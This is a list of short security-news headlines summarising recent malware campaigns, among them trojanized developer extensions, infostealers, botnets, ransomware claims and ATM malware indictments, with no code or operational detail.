First macOS-focused wave of GlassWorm malware discovered on Open VSX marketplace, stealing cryptocurrency wallets, Keychain passwords, and developer credentials through trojanized extensions.
Hudson Rock research reveals 220 legitimate business websites hijacked for ClickFix malware attacks after admin credentials were stolen by infostealers.
Popular text editor's download page was hijacked for four days in December, serving trojanized installers that steal browser credentials and crypto wallets.
Nine-month-old botnet campaign pivots to exploit CVE-2025-55182 in Next.js, deploying cryptominers and Mirai variants across exposed instances.
The self-propagating VS Code extension worm now replaces Ledger Live and Trezor Suite with trojanized versions. Russian-speaking operators behind campaign.
A five-year investigation ends with extradition to South Korea. The 29-year-old allegedly infected 2.8 million Windows systems through trojanized software activation tools.
Chinese threat actor behind coordinated extension campaigns spanning seven years. Zoom Stealer component harvested corporate meeting credentials from 28 platforms.
New variant distributed as signed and notarized Swift app evades built-in security. Jamf Threat Labs traces evolution from ClickFix techniques to silent installer approach.
Supply chain attack disguised as working WhatsApp API library stole credentials, messages, and linked attacker devices to victim accounts. 56,000+ downloads since May.
Ransomware tracking data shows 63 total claims from 6 groups on December 26. LockBit's revival dominates holiday attack wave targeting reduced security staff.
Federal indictments target Tren de Aragua members who used Ploutus malware to steal over $40 million from U.S. ATMs since 2021.
Massive Android botnet targets set-top boxes and tablets, issued 1.7 billion attack commands in 3 days, briefly surpassing Google in DNS rankings.
Russian-developed infostealer now production-ready after December 16 release, targets browser credentials, crypto wallets, and messaging apps for $175/month.
New $150/month malware platform allows attackers to create weaponized versions of legitimate Android apps while maintaining full functionality.
Security researchers uncover sophisticated steganography attack concealing malicious JavaScript within PNG logo files of 17 Firefox browser extensions.